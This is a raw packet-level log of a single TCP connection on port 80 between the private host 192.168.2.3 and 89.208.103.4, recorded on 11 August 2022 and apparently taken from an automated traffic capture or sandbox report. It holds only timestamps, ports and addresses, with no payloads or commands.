Aug 11, 2022 06:57:07.321435928 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.321472883 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.321474075 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.321513891 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.321515083 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.321527958 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.321553946 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.321571112 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.321593046 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.321611881 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.321635962 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.321636915 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.321691990 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.321769953 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.321810007 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.321839094 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.321851015 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.321862936 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.321890116 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.321903944 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.321929932 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.321938038 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.321971893 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.321985960 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.322010040 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.322025061 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.322052002 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.322062016 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.322093010 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.322103024 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.322132111 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.322149992 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.322169065 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.322207928 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.322259903 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.322323084 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.322365046 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.322376013 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.322407961 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.322422028 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.322447062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.322460890 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.322489023 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.322491884 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.322529078 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.322545052 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.322568893 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.322575092 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.322608948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.322632074 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.322654963 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.322729111 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.322770119 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.322782040 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.322810888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.322822094 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.322849989 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.322866917 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.322889090 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.322894096 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.322930098 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.322936058 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.322968006 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.322979927 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.323009014 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.323024035 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.323048115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.323060989 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.323090076 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.323096991 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.323131084 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.323148966 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.323169947 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.323178053 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.323210955 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.323220015 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.323251009 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.323261023 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.323288918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.323302031 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.323329926 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.323333025 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.323388100 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.323400021 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.323451996 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.323733091 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.323772907 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.323798895 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.323812962 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.323817968 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.323853970 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.323862076 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.323893070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.323909044 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.323932886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.323937893 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.323973894 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.323982000 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.324012041 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.324027061 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.324052095 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.324059010 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.324091911 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.324107885 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.324132919 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.324146986 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.324176073 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.324177027 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.324223995 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.324718952 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.324758053 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.324784994 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.324798107 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.324815035 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.324845076 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.331595898 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.331639051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.331676006 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.331697941 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.334697962 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.334743023 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.334779024 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.334779978 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.334794998 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.334822893 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.334836960 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.334865093 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.334877968 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.334902048 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.334928036 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.334942102 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.334952116 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.334981918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.334995031 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.335033894 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.335877895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.335918903 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.335953951 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.335958958 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.335993052 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.335999966 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.336009979 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.336038113 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.336069107 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.336076975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.336078882 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.336116076 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.336144924 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.336155891 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.336174965 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.336195946 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.336199999 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.336234093 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.336261988 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.336328030 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.336344004 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.336384058 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.336421013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.336426973 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.336457014 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.336461067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.336476088 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.336498022 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.336513042 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.336538076 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.336550951 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.336577892 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.336592913 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.336618900 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.336637020 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.336659908 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.336671114 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.336699009 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.336718082 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.336745977 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.336891890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.336931944 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.336949110 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.336971998 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.336980104 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337009907 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337035894 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337049007 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337060928 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337088108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337105036 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337126970 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337153912 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337165117 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337176085 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337204933 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337219954 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337244034 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337260008 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337300062 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337313890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337354898 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337378979 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337399006 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337426901 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337439060 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337464094 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337479115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337507010 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337517977 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337548971 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337558031 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337575912 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337599993 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337615967 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337637901 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337654114 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337677956 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337690115 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337717056 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337734938 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337755919 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337766886 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337800980 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337826014 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337846994 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337877989 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337884903 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337896109 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337924957 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337943077 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.337964058 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.337975025 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.338005066 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.338021040 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.338046074 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.338052988 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.338083982 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.338099957 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.338124037 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.338152885 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.338181973 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.338253975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.338295937 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.338314056 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.338335991 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.338372946 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.338380098 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.338414907 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.338455915 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.338458061 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.338469982 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.338496923 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.338525057 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.338536978 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.338561058 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.338574886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.338613033 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.338614941 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.338624954 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.338654995 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.338681936 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.338691950 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.338713884 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.338732004 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.338752031 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.338779926 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.338788986 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.338818073 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.338844061 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.338857889 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.338865995 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.338896990 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.338936090 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.338947058 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.338974953 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.338990927 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.339014053 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.339040041 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.339052916 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.339078903 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.339092016 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.339103937 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.339132071 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.339147091 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.339171886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.339194059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.339210987 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.339240074 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.339251041 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.339258909 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.339291096 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.339304924 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.339350939 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.340467930 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.340507984 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.340543985 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.340544939 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.340565920 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.340584993 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.340585947 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.340624094 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.340636969 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.340662956 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.340687037 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.340703011 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.340713024 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.340743065 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.340759039 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.340805054 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.343606949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.343630075 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.343683004 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.343708038 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.344624996 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.344645977 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.344667912 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.344676018 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.344696045 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.344717979 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.345201015 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.345223904 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.345244884 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.345251083 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.345268011 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.345271111 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.345290899 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.345293999 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.345314980 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.345315933 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.345338106 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.345346928 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.345362902 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.345374107 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.345397949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.345411062 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.345422983 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.345454931 CEST	49736	80	192.168.2.3	89.208.103.4
